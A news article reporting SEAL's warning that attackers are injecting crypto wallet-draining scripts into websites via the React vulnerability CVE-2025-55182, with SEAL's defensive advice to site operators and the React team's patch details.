Cybersecurity nonprofit Security Alliance (SEAL) has reported a recent surge in crypto drainers being injected into websites via a vulnerability in the open-source JavaScript library React.
React, widely used for building web application user interfaces, disclosed on Dec. 3 that white-hat hacker Lachlan Davidson had identified a security flaw allowing unauthenticated remote code execution—potentially letting attackers insert and run their own code.
SEAL noted that malicious actors are exploiting this vulnerability, CVE-2025-55182, to secretly embed wallet-draining scripts on crypto websites.
“We are seeing a significant increase in drainers being uploaded to legitimate crypto websites through exploitation of the recent React CVE. All sites should immediately review their front-end code for suspicious assets,” SEAL said.
“The attack is targeting not only Web3 protocols! All websites are at risk. Users should exercise caution when signing ANY permit signature.”
Wallet drainers typically trick users into signing malicious transactions, often through fake pop-ups that promise rewards or use similar deceptive tactics.
Websites flagged for phishing should check their code
Some websites may have been suddenly flagged as potential phishing risks without clear explanation, according to the SEAL Team. They advise website operators to take precautions to ensure no hidden wallet-draining scripts are putting users at risk.
“Scan your host for CVE-2025-55182. Check if your front-end code is unexpectedly loading assets from unknown hosts. Look for any obfuscated JavaScript in your scripts. Verify that wallet signature requests show the correct recipient,” SEAL said.
“If your project is being blocked, this could be the reason. Review your code carefully before requesting removal of the phishing warning,” the team added.
React releases fix for the vulnerability
The React team released a patch for CVE-2025-55182 on Dec. 3, urging anyone using react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack to upgrade immediately.
“If your app’s React code does not use a server, it is not affected. Similarly, apps that don’t use a framework, bundler, or bundler plugin supporting React Server Components are also unaffected,” the React team clarified.
